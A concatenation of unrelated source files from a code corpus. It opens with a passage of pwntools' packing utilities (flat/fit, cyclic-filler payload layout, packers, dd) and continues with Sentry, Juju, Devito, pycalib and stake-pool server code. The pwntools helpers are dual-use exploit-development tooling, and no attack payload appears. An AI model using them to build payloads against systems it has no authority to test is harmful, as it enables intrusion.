kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a number and returns a string
of that number in a packed form.
Examples:
>>> p = make_packer(32, endian='little', sign='unsigned')
>>> p
<function _p32lu at 0x...>
>>> p(42)
b'*\\x00\\x00\\x00'
>>> p(-1)
Traceback (most recent call last):
...
error: integer out of range for 'I' format code
>>> make_packer(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
with context.local(sign=sign, **kwargs):
word_size = word_size or context.word_size
endianness = context.endianness
sign = sign if sign is None else context.sign
if word_size in [8, 16, 32, 64]:
packer = {
(8, 0, 0): _p8lu,
(8, 0, 1): _p8ls,
(8, 1, 0): _p8bu,
(8, 1, 1): _p8bs,
(16, 0, 0): _p16lu,
(16, 0, 1): _p16ls,
(16, 1, 0): _p16bu,
(16, 1, 1): _p16bs,
(32, 0, 0): _p32lu,
(32, 0, 1): _p32ls,
(32, 1, 0): _p32bu,
(32, 1, 1): _p32bs,
(64, 0, 0): _p64lu,
(64, 0, 1): _p64ls,
(64, 1, 0): _p64bu,
(64, 1, 1): _p64bs,
}.get((word_size, {'big': 1, 'little': 0}[endianness], sign), None)
if packer:
return packer
return lambda number: pack(number, word_size, endianness, sign)
@LocalNoarchContext
def make_unpacker(word_size = None, endianness = None, sign = None, **kwargs):
"""make_unpacker(word_size = None, endianness = None, sign = None, **kwargs) -> str → number
Creates a unpacker by "freezing" the given arguments.
Semantically calling ``make_unpacker(w, e, s)(data)`` is equivalent to calling
``unpack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a string and returns a number
of that string in an unpacked form.
Examples:
>>> u = make_unpacker(32, endian='little', sign='unsigned')
>>> u
<function _u32lu at 0x...>
>>> hex(u('/bin'))
'0x6e69622f'
>>> u('abcde')
Traceback (most recent call last):
...
error: unpack requires a string argument of length 4
>>> make_unpacker(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size in [8, 16, 32, 64]:
endianness = 1 if endianness == 'big' else 0
return {
(8, 0, 0): _u8lu,
(8, 0, 1): _u8ls,
(8, 1, 0): _u8bu,
(8, 1, 1): _u8bs,
(16, 0, 0): _u16lu,
(16, 0, 1): _u16ls,
(16, 1, 0): _u16bu,
(16, 1, 1): _u16bs,
(32, 0, 0): _u32lu,
(32, 0, 1): _u32ls,
(32, 1, 0): _u32bu,
(32, 1, 1): _u32bs,
(64, 0, 0): _u64lu,
(64, 0, 1): _u64ls,
(64, 1, 0): _u64bu,
(64, 1, 1): _u64bs,
}[word_size, endianness, sign]
else:
return lambda number: unpack(number, word_size, endianness, sign)
def _fit(pieces, preprocessor, packer, filler):
# Pulls bytes from `filler` and adds them to `pad` until it ends in `key`.
# Returns the index of `key` in `pad`.
pad = bytearray()
def fill(key):
key = bytearray(key)
offset = pad.find(key)
while offset == -1:
pad.append(next(filler))
offset = pad.find(key, -len(key))
return offset
# Key conversion:
# - convert str/unicode keys to offsets
# - convert large int (no null-bytes in a machine word) keys to offsets
pieces_ = dict()
large_key = 2**(context.word_size-8)
for k, v in pieces.items():
if isinstance(k, six.integer_types):
if k >= large_key:
k = fill(pack(k))
elif isinstance(k, six.text_type):
k = fill(k.encode('utf8'))
elif isinstance(k, (bytearray, bytes)):
k = fill(k)
else:
raise TypeError("flat(): offset must be of type int or str, but got '%s'" % type(k))
if k in pieces_:
raise ValueError("flag(): multiple values at offset %d" % k)
pieces_[k] = v
pieces = pieces_
# We must "roll back" `filler` so each recursive call to `_flat` gets it in
# the right position
filler = iters.chain(pad, filler)
# Build output
out = b''
# Negative indices need to be removed and then re-submitted
negative = {k:v for k,v in pieces.items() if isinstance(k, int) and k<0}
for k in negative:
del pieces[k]
# Positive output
for k, v in sorted(pieces.items()):
if k < len(out):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out) < k:
out += p8(next(filler))
# Recursively flatten data
out += _flat([v], preprocessor, packer, filler)
# Now do negative indices
out_negative = b''
if negative:
most_negative = min(negative.keys())
for k, v in sorted(negative.items()):
k += -most_negative
if k < len(out_negative):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out_negative) < k:
out_negative += p8(next(filler))
# Recursively flatten data
out_negative += _flat([v], preprocessor, packer, filler)
return filler, out_negative + out
def _flat(args, preprocessor, packer, filler):
out = []
for arg in args:
if not isinstance(arg, (list, tuple, dict)):
arg_ = preprocessor(arg)
if arg_ is not None:
arg = arg_
if hasattr(arg, '__flat__'):
val = arg.__flat__()
elif isinstance(arg, (list, tuple)):
val = _flat(arg, preprocessor, packer, filler)
elif isinstance(arg, dict):
filler, val = _fit(arg, preprocessor, packer, filler)
elif isinstance(arg, bytes):
val = arg
elif isinstance(arg, six.text_type):
val = arg.encode('utf8')
elif isinstance(arg, six.integer_types):
val = packer(arg)
elif isinstance(arg, bytearray):
val = bytes(arg)
else:
raise ValueError("flat(): Flat does not support values of type %s" % type(arg))
out.append(val)
# Advance `filler` for "non-recursive" values
if not isinstance(arg, (list, tuple, dict)):
for _ in range(len(val)):
next(filler)
return b''.join(out)
@LocalNoarchContext
def flat(*args, **kwargs):
r"""flat(\*args, preprocessor = None, length = None, filler = de_bruijn(),
word_size = None, endianness = None, sign = None) -> str
Flattens the arguments into a string.
This function takes an arbitrary number of arbitrarily nested lists, tuples
and dictionaries. It will then find every string and number inside those
and flatten them out. Strings are inserted directly while numbers are
packed using the :func:`pack` function. Unicode strings are UTF-8 encoded.
Dictionary keys give offsets at which to place the corresponding values
(which are recursively flattened). Offsets are relative to where the
flattened dictionary occurs in the output (i.e. `{0: 'foo'}` is equivalent
to `'foo'`). Offsets can be integers, unicode strings or regular strings.
Integer offsets >= ``2**(word_size-8)`` are converted to a string using
`:func:pack`. Unicode strings are UTF-8 encoded. After these conversions
offsets are either integers or strings. In the latter case, the offset will
be the lowest index at which the string occurs in `filler`. See examples
below.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be byte at index ``n % len(iterable)`` byte
in `filler` if it has finite length or the byte at index `n` otherwise.
If `length` is given, the output will be padded with bytes from `filler` to
be this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
The three kwargs `word_size`, `endianness` and `sign` will default to using
values in :mod:`pwnlib.context` if not specified as an argument.
Arguments:
args: Values to flatten
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
length: The length of the output.
filler: Iterable to use for padding.
word_size (int): Word size of the converted integer.
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer (False/True)
Examples:
(Test setup, please ignore)
>>> context.clear()
Basic usage of :meth:`flat` works similar to the pack() routines.
>>> flat(4)
b'\x04\x00\x00\x00'
:meth:`flat` works with strings, bytes, lists, and dictionaries.
>>> flat(b'X')
b'X'
>>> flat([1,2,3])
b'\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00'
>>> flat({4:'X'})
b'aaaaX'
:meth:`.flat` flattens all of the values provided, and allows nested lists
and dictionaries.
>>> flat([{4:'X'}] * 2)
b'aaaaXaaacX'
>>> flat([[[[[[[[[1]]]], 2]]]]])
b'\x01\x00\x00\x00\x02\x00\x00\x00'
You can also provide additional arguments like endianness, word-size, and
whether the values are treated as signed or not.
>>> flat(1, "test", [[["AB"]*2]*3], endianness = 'little', word_size = 16, sign = False)
b'\x01\x00testABABABABABAB'
A preprocessor function can be provided in order to modify the values in-flight.
This example converts increments each value by 1, then converts to a string.
>>> flat([1, [2, 3]], preprocessor = lambda x: str(x+1))
b'234'
Using dictionaries is a fast way to get specific values at specific offsets,
without having to do ``data += "foo"`` repeatedly.
>>> flat({12: 0x41414141,
... 24: 'Hello',
... })
b'aaaabaaacaaaAAAAeaaafaaaHello'
Dictionary usage permits directly using values derived from :func:`.cyclic`.
    See :func:`.cyclic`, :func:`pwnlib.context.context.cyclic_alphabet`, and :data:`.context.cyclic_size`
for more options.
The cyclic pattern can be provided as either the text or hexadecimal offset.
>>> flat({ 0x61616162: 'X'})
b'aaaaX'
>>> flat({'baaa': 'X'})
b'aaaaX'
Fields do not have to be in linear order, and can be freely mixed.
This also works with cyclic offsets.
>>> flat({2: 'A', 0:'B'})
b'BaA'
>>> flat({0x61616161:'x', 0x61616162:'y'})
b'xaaay'
>>> flat({0x61616162:'y', 0x61616161:'x'})
b'xaaay'
Fields do not have to be in order, and can be freely mixed.
>>> flat({'caaa': 'XXXX', 16: '\x41', 20: 0xdeadbeef})
b'aaaabaaaXXXXdaaaAaaa\xef\xbe\xad\xde'
>>> flat({ 8: [0x41414141, 0x42424242], 20: 'CCCC'})
b'aaaabaaaAAAABBBBeaaaCCCC'
>>> fit({
... 0x61616161: 'a',
... 1: 'b',
... 0x61616161+2: 'c',
... 3: 'd',
... })
b'abadbaaac'
By default, gaps in the data are filled in with the :meth:`.cyclic` pattern.
You can customize this by providing an iterable or method for the ``filler``
argument.
>>> flat({12: 'XXXX'}, filler = b'_', length = 20)
b'____________XXXX____'
>>> flat({12: 'XXXX'}, filler = b'AB', length = 20)
b'ABABABABABABXXXXABAB'
Nested dictionaries also work as expected.
>>> flat({4: {0: 'X', 4: 'Y'}})
b'aaaaXaaaY'
>>> fit({4: {4: 'XXXX'}})
b'aaaabaaaXXXX'
Negative indices are also supported, though this only works for integer
keys.
>>> flat({-4: 'x', -1: 'A', 0: '0', 4:'y'})
b'xaaA0aaay'
"""
# HACK: To avoid circular imports we need to delay the import of `cyclic`
from pwnlib.util import cyclic
preprocessor = kwargs.pop('preprocessor', lambda x: None)
filler = kwargs.pop('filler', cyclic.de_bruijn())
length = kwargs.pop('length', None)
if isinstance(filler, str):
filler = bytearray(six.ensure_binary(filler))
if kwargs != {}:
raise TypeError("flat() does not support argument %r" % kwargs.popitem()[0])
filler = iters.cycle(filler)
out = _flat(args, preprocessor, make_packer(), filler)
if length:
if len(out) > length:
raise ValueError("flat(): Arguments does not fit within `length` (= %d) bytes" % length)
out += b''.join(p8(next(filler)) for _ in range(length - len(out)))
return out
def fit(*args, **kwargs):
"""Legacy alias for :func:`flat`"""
return flat(*args, **kwargs)
"""
Generates a string from a dictionary mapping offsets to data to place at
that offset.
For each key-value pair in `pieces`, the key is either an offset or a byte
sequence. In the latter case, the offset will be the lowest index at which
the sequence occurs in `filler`. See examples below.
Each piece of data is passed to :meth:`flat` along with the keyword
arguments `word_size`, `endianness` and `sign`.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be byte at index ``n % len(iterable)`` byte
in `filler` if it has finite length or the byte at index `n` otherwise.
If `length` is given, the output will padded with bytes from `filler` to be
this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
If entries in `pieces` overlap, a :py:exc:`ValueError` exception is
raised.
Arguments:
pieces: Offsets and values to output.
length: The length of the output.
filler: Iterable to use for padding.
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
word_size (int): Word size of the converted integer (in bits).
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer (False/True)
Examples:
"""
def signed(integer):
return unpack(pack(integer), signed=True)
def unsigned(integer):
return unpack(pack(integer))
def dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False):
"""dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False) -> dst
Inspired by the command line tool ``dd``, this function copies `count` byte
values from offset `seek` in `src` to offset `skip` in `dst`. If `count` is
0, all of ``src[seek:]`` is copied.
If `dst` is a mutable type it will be updated. Otherwise a new instance of
the same type will be created. In either case the result is returned.
`src` can be an iterable of characters or integers, a unicode string or a
file object. If it is an iterable of integers, each integer must be in the
range [0;255]. If it is a unicode string, its UTF-8 encoding will be used.
The seek offset of file objects will be preserved.
Arguments:
dst: Supported types are `:class:file`, `:class:list`, `:class:tuple`,
`:class:str`, `:class:bytearray` and `:class:unicode`.
src: An iterable of byte values (characters or integers), a unicode
string or a file object.
count (int): How many bytes to copy. If `count` is 0 or larger than
``len(src[seek:])``, all bytes until the end of `src` are
copied.
skip (int): Offset in `dst` to copy to.
seek (int): Offset in `src` to copy from.
truncate (bool): If `:const:True`, `dst` is truncated at the last copied
byte.
Returns:
A modified version of `dst`. If `dst` is a mutable type it will be
modified in-place.
Examples:
>>> dd(tuple('Hello!'), b'?', skip = 5)
('H', 'e', 'l', 'l', 'o', b'?')
>>> dd(list('Hello!'), (63,), skip = 5)
['H', 'e', 'l', 'l', 'o', b'?']
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4).read()
'AAA\\x00\\x00\\x00\\x00AAA'
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4, truncate = True).read()
'AAA\\x00\\x00\\x00\\x00'
"""
# Re-open file objects to make sure we have the mode right
if hasattr(src, 'name'):
src = open(src.name, 'rb')
if hasattr(dst, 'name'):
real_dst = dst
dst = open(dst.name, 'rb+')
# Special case: both `src` and `dst` are files, so we don't need to hold
# everything in memory
if hasattr(src, 'seek') and hasattr(dst, 'seek'):
src.seek(seek)
dst.seek(skip)
n = 0
if count:
while n < count:
s = src.read(min(count - n, 0x1000))
if not s:
break
n += len(s)
dst.write(s)
else:
while True:
s = src.read(0x1000)
if not s:
break
n += len(s)
dst.write(s)
if truncate:
dst.truncate(skip + n)
src.close()
dst.close()
return real_dst
# Otherwise get `src` in canonical form, i.e. a string of at most `count`
# bytes
if isinstance(src, six.text_type):
if count:
# The only way to know where the `seek`th byte is, is to decode, but
# we only need to decode up to the first `seek + count` code points
src = src[:seek + count].encode('utf8')
# The code points may result in more that `seek + count` bytes
src = src[seek : seek + count]
else:
src = src.encode('utf8')[seek:]
elif hasattr(src, 'seek'):
src.seek(seek)
src_ = b''
if count:
while len(src_) < count:
s = src.read(count - len(src_))
if not s:
break
src_ += s
else:
while True:
s = src.read()
if not s:
break
src_ += s
src.close()
src = src_
elif isinstance(src, bytes):
if count:
src = src[seek : seek + count]
else:
src = src[seek:]
elif hasattr(src, '__iter__'):
src = src[seek:]
src_ = b''
for i, b in enumerate(src, seek):
if count and i > count + seek:
break
if isinstance(b, bytes):
src_ += b
elif isinstance(b, six.integer_types):
if b > 255 or b < 0:
raise ValueError("dd(): Source value %d at index %d is not in range [0;255]" % (b, i))
src_ += _p8lu(b)
else:
raise TypeError("dd(): Unsupported `src` element type: %r" % type(b))
src = src_
else:
raise TypeError("dd(): Unsupported `src` type: %r" % type(src))
# If truncate, then where?
if truncate:
truncate = skip + len(src)
# UTF-8 encode unicode `dst`
if isinstance(dst, six.text_type):
dst = dst.encode('utf8')
utf8 = True
else:
utf8 = False
# Match on the type of `dst`
if hasattr(dst, 'seek'):
dst.seek(skip)
dst.write(src)
if truncate:
dst.truncate(truncate)
dst.close()
dst = real_dst
elif isinstance(dst, (list, bytearray)):
dst[skip : skip + len(src)] = list(map(p8, bytearray(src)))
if truncate:
while len(dst) > truncate:
dst.pop()
elif isinstance(dst, tuple):
tail = dst[skip + len(src):]
dst = dst[:skip] + tuple(map(p8, bytearray(src)))
if not truncate:
dst = dst + tail
elif isinstance(dst, bytes):
tail = dst[skip + len(src):]
dst = dst[:skip] + src
if not truncate:
dst = dst + tail
else:
raise TypeError("dd(): Unsupported `dst` type: %r" % type(dst))
if utf8:
dst = dst.decode('utf8')
return dst
del op, size, end, sign
del name, routine, mod
|
the-stack_0_12391 | from __future__ import absolute_import
from datetime import datetime, timedelta
import six
import time
import logging
from mock import patch, Mock
from sentry.event_manager import EventManager
from sentry.eventstream.kafka import KafkaEventStream
from sentry.testutils import SnubaTestCase
from sentry.utils import snuba, json
class SnubaEventStreamTest(SnubaTestCase):
def setUp(self):
super(SnubaEventStreamTest, self).setUp()
self.kafka_eventstream = KafkaEventStream()
self.kafka_eventstream.producer = Mock()
@patch('sentry.eventstream.insert')
def test(self, mock_eventstream_insert):
now = datetime.utcnow()
def _get_event_count():
return snuba.query(
start=now - timedelta(days=1),
end=now + timedelta(days=1),
groupby=['project_id'],
filter_keys={'project_id': [self.project.id]},
).get(self.project.id, 0)
assert _get_event_count() == 0
raw_event = {
'event_id': 'a' * 32,
'message': 'foo',
'timestamp': time.mktime(now.timetuple()),
'level': logging.ERROR,
'logger': 'default',
'tags': [],
}
manager = EventManager(raw_event)
manager.normalize()
event = manager.save(self.project.id)
# verify eventstream was called by EventManager
insert_args, insert_kwargs = list(mock_eventstream_insert.call_args)
assert not insert_args
assert insert_kwargs == {
'event': event,
'group': event.group,
'is_new_group_environment': True,
'is_new': True,
'is_regression': False,
'is_sample': False,
'primary_hash': 'acbd18db4cc2f85cedef654fccc4a4d8',
'skip_consume': False
}
# pass arguments on to Kafka EventManager
self.kafka_eventstream.insert(*insert_args, **insert_kwargs)
produce_args, produce_kwargs = list(self.kafka_eventstream.producer.produce.call_args)
assert not produce_args
assert produce_kwargs['topic'] == 'events'
assert produce_kwargs['key'] == six.text_type(self.project.id)
version, type_, primary_payload = json.loads(produce_kwargs['value'])[:3]
assert version == 2
assert type_ == 'insert'
# insert what would have been the Kafka payload directly
# into Snuba, expect an HTTP 200 and for the event to now exist
snuba.insert_raw([primary_payload])
assert _get_event_count() == 1
|
the-stack_0_12392 | import pytest
from .. import base
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'mysql',
application_name='mysql',
series='trusty',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
|
the-stack_0_12394 | from devito.ir.iet import Iteration, List, IterationTree, FindSections, FindSymbols
from devito.symbolics import Macro
from devito.tools import flatten
from devito.types import Array, LocalObject
__all__ = ['filter_iterations', 'retrieve_iteration_tree',
'compose_nodes', 'derive_parameters']
def retrieve_iteration_tree(node, mode='normal'):
"""Return a list of all :class:`Iteration` sub-trees rooted in ``node``.
For example, given the Iteration tree:
.. code-block:: c
Iteration i
expr0
Iteration j
Iteraion k
expr1
Iteration p
expr2
Return the list: ::
[(Iteration i, Iteration j, Iteration k), (Iteration i, Iteration p)]
:param node: The searched Iteration/Expression tree.
:param mode: Accepted values are 'normal' (default) and 'superset', in which
case iteration trees that are subset of larger iteration trees
are dropped.
"""
assert mode in ('normal', 'superset')
trees = [IterationTree(i) for i in FindSections().visit(node) if i]
if mode == 'normal':
return trees
else:
match = []
for i in trees:
if any(set(i).issubset(set(j)) for j in trees if i != j):
continue
match.append(i)
return IterationTree(match)
def filter_iterations(tree, key=lambda i: i, stop=lambda: False):
"""
Given an iterable of :class:`Iteration` objects, return a new list
containing all items such that ``key(o)`` is True.
This function accepts an optional argument ``stop``. This may be either a
lambda function, specifying a stop criterium, or any of the following
special keywords: ::
* 'any': Return as soon as ``key(o)`` is False and at least one
item has been collected.
* 'asap': Return as soon as at least one item has been collected and
all items for which ``key(o)`` is False have been encountered.
It is useful to specify a ``stop`` criterium when one is searching the
first Iteration in an Iteration/Expression tree for which a given property
does not hold.
"""
assert callable(stop) or stop in ['any', 'asap']
tree = list(tree)
filtered = []
off = []
if stop == 'any':
stop = lambda: len(filtered) > 0
elif stop == 'asap':
hits = [i for i in tree if not key(i)]
stop = lambda: len(filtered) > 0 and len(off) == len(hits)
for i in tree:
if key(i):
filtered.append(i)
else:
off.append(i)
if stop():
break
return filtered
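# Sketch (assuming Iteration exposes an ``is_Parallel`` property):
#   filter_iterations(tree, key=lambda i: i.is_Parallel, stop='asap')
# would return the outermost run of parallel Iterations in ``tree``.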
def compose_nodes(nodes, retrieve=False):
"""
Build an Iteration/Expression tree by nesting the nodes in ``nodes``.
"""
l = list(nodes)
tree = []
if not isinstance(l[0], Iteration):
# Nothing to compose
body = flatten(l)
body = List(body=body) if len(body) > 1 else body[0]
else:
body = l.pop(-1)
while l:
handle = l.pop(-1)
body = handle._rebuild(body, **handle.args_frozen)
tree.append(body)
if retrieve is True:
tree = list(reversed(tree))
return body, tree
else:
return body
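# Sketch (hypothetical Iteration objects ``i``, ``j`` and expression ``e``):
#   compose_nodes([i, j, e]) nests them as Iteration i -> Iteration j -> e;
#   with retrieve=True it also returns the rebuilt Iterations, outermost first.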
def derive_parameters(nodes, drop_locals=False):
"""
Derive all input parameters (function call arguments) from an IET
by collecting all symbols not defined in the tree itself.
"""
# Pick all free symbols and symbolic functions from the kernel
functions = FindSymbols('symbolics').visit(nodes)
free_symbols = FindSymbols('free-symbols').visit(nodes)
# Filter out function base symbols and use real function objects
function_names = [s.name for s in functions]
symbols = [s for s in free_symbols if s.name not in function_names]
symbols = functions + symbols
defines = [s.name for s in FindSymbols('defines').visit(nodes)]
parameters = tuple(s for s in symbols if s.name not in defines)
# Drop globally-visible objects
parameters = [p for p in parameters if not isinstance(p, Macro)]
# Filter out locally-allocated Arrays and Objects
if drop_locals:
parameters = [p for p in parameters
if not (isinstance(p, Array) and (p._mem_heap or p._mem_stack))]
parameters = [p for p in parameters if not isinstance(p, LocalObject)]
return parameters
|
the-stack_0_12395 | def more_even_or_odd(integers):
ans = ""
even = 0
odd = 0
for i in integers:
if i % 2 == 0:
even += 1
else:
odd += 1
if even > odd:
ans += "Even"
elif even < odd:
ans += "Odd"
else:
ans += "Equal"
return ans |
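# e.g. more_even_or_odd([1, 2, 3]) -> "Odd", more_even_or_odd([2, 4]) -> "Even",
# more_even_or_odd([1, 2]) -> "Equal"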
the-stack_0_12396 | # Standard imports
import pytest
import numpy as np
# Package imports
import pycalib.calibration_methods as calm
# General
@pytest.fixture(scope='module')
def sample_size():
return 1000
@pytest.fixture(scope='module')
def p_dist_beta(sample_size, a=1, b=4):
# Predicted probabilities (transformed to [0.5, 1])
return np.hstack([np.random.beta(a=a, b=b, size=sample_size)]) * 0.5 + 0.5
@pytest.fixture(scope='module')
def y_cal_binary(sample_size, prob_class_0=.66):
# Sample ground truth
return np.random.choice(a=[0, 1], size=sample_size, replace=True, p=[prob_class_0, 1 - prob_class_0])
@pytest.fixture(scope='module')
def p_cal_binary(sample_size, y_cal_binary, p_dist_beta, a=3, b=.1, c=1):
# Uncalibrated probabilities through miscalibration function f
# f = lambda x: 1 / (1 + c * (1 - x) ** a / x ** b)
f = lambda x: 1 / (1 + np.exp(-a * x - b))
sampler_f = lambda w, y: np.random.choice(a=[1 - y, y], p=[1 - f(w), f(w)])
y_pred = np.array(list(map(sampler_f, p_dist_beta, y_cal_binary)))
# Compute probabilities for other classes
p_pred = np.zeros([sample_size, 2])
for i in range(0, 2):
# Set probabilities for correct predictions
correct_and_index_i = (y_pred == y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[correct_and_index_i]
p_pred[correct_and_index_i, i] = prob
p_pred[correct_and_index_i, 1 - i] = 1 - prob
# Set probabilities for incorrect predictions
false_and_index_i = (y_pred != y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[false_and_index_i]
p_pred[false_and_index_i, i] = 1 - prob
p_pred[false_and_index_i, 1 - i] = prob
return p_pred
# Temperature Scaling
def test_constant_accuracy(p_cal_binary, y_cal_binary):
# Compute accuracy
acc = np.mean(np.equal(np.argmax(p_cal_binary, axis=1), y_cal_binary))
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Test constant accuracy on calibration set
p_ts = ts.predict_proba(p_cal_binary)
acc_ts = np.mean(np.equal(np.argmax(p_ts, axis=1), y_cal_binary))
assert acc == acc_ts, "Accuracy of calibrated probabilities does not match accuracy of calibration set."
def test_temperature_positive(p_cal_binary, y_cal_binary):
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Positive temperature
assert ts.T > 0, "Temperature is not positive."
# Histogram Binning
@pytest.mark.parametrize("binning_mode", [
("equal_width"),
("equal_freq")
])
def test_hist_binning_bin_size(p_cal_binary, y_cal_binary, binning_mode):
n_bins = 2
hb = calm.HistogramBinning(mode=binning_mode, n_bins=n_bins)
hb.fit(p_cal_binary, y_cal_binary)
assert len(hb.binning) == n_bins + 1, "Number of bins does not match input."
# Bayesian Binning into Quantiles
def test_bin_with_size_zero():
# Data
p_cal = .5 * np.ones([100, 2])
y_cal = np.hstack([np.ones([50]), np.zeros([50])])
# Fit calibration model
bbq = calm.BayesianBinningQuantiles()
bbq.fit(X=p_cal, y=y_cal)
# Predict
p_pred = bbq.predict_proba(X=p_cal)
# Check for NaNs
assert not np.any(np.isnan(p_pred)), "Calibrated probabilities are NaN."
# GP calibration
def test_inference_mean_approximation(p_cal_binary, y_cal_binary):
# GP calibration
gpc = calm.GPCalibration(n_classes=2, logits=False, random_state=42)
gpc.fit(p_cal_binary, y_cal_binary)
# Inference: mean approximation
p_gpc = gpc.predict_proba(p_cal_binary, mean_approx=True)
# Check for NaNs in predictions
assert not np.any(np.isnan(p_gpc)), "Calibrated probabilities of the mean approximation are NaN."
# OneVsAll calibration
def test_output_size_missing_classes():
# Generate random training data with n_classes > n_calibration
np.random.seed(1)
n_classes = 200
n_calibration = 100
X_cal = np.random.uniform(0, 1, [n_calibration, n_classes])
X_cal /= np.sum(X_cal, axis=1)[:, np.newaxis]
y_cal = np.random.choice(range(n_classes), n_calibration)
# Arbitrary Choice of binary calibration method
platt = calm.PlattScaling()
platt.fit(X_cal, y_cal)
# Test output size
assert np.shape(platt.predict_proba(X_cal))[
1] == n_classes, "Predicted probabilities do not match number of classes."
|
the-stack_0_12397 | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2019 The Particl Core developers
# Copyright (c) 2020 The Capricoin+ Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
import os
import json
import hashlib
import threading
import decimal
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer
from .util import (
COIN,
makeInt,
format8,
format16,
)
class HttpHandler(BaseHTTPRequestHandler):
def page_error(self, error_str):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Error</title></head>' \
+ '<body>' \
+ '<p>Error: ' + error_str + '</p>' \
+ '<p><a href=\'/\'>home</a></p>' \
+ '</body></html>'
return bytes(content, 'UTF-8')
def js_error(self, error_str):
error_str_json = json.dumps({'error': error_str})
return bytes(error_str_json, 'UTF-8')
def js_address(self, urlSplit):
if len(urlSplit) < 4:
raise ValueError('Must specify address')
address_str = urlSplit[3]
stakePool = self.server.stakePool
return bytes(json.dumps(stakePool.getAddressSummary(address_str)), 'UTF-8')
def js_metrics(self, urlSplit):
stakePool = self.server.stakePool
if len(urlSplit) > 3:
code_str = urlSplit[3]
hashed = hashlib.sha256(str(code_str + self.server.management_key_salt).encode('utf-8')).hexdigest()
if not hashed == self.server.management_key_hash:
raise ValueError('Unknown argument')
return bytes(json.dumps(stakePool.rebuildMetrics()), 'UTF-8')
return bytes(json.dumps(stakePool.getMetrics()), 'UTF-8')
def js_index(self, urlSplit):
return bytes(json.dumps(self.server.stakePool.getSummary()), 'UTF-8')
def page_config(self, urlSplit):
settings_path = os.path.join(self.server.stakePool.dataDir, 'stakepool.json')
if not os.path.exists(settings_path):
return self.page_error('Settings file not found.')
with open(settings_path) as fs:
settings = json.load(fs)
settings['capricoinplusbindir'] = '...'
settings['capricoinplusdatadir'] = '...'
settings['poolownerwithdrawal'] = '...'
settings.pop('management_key_salt', None)
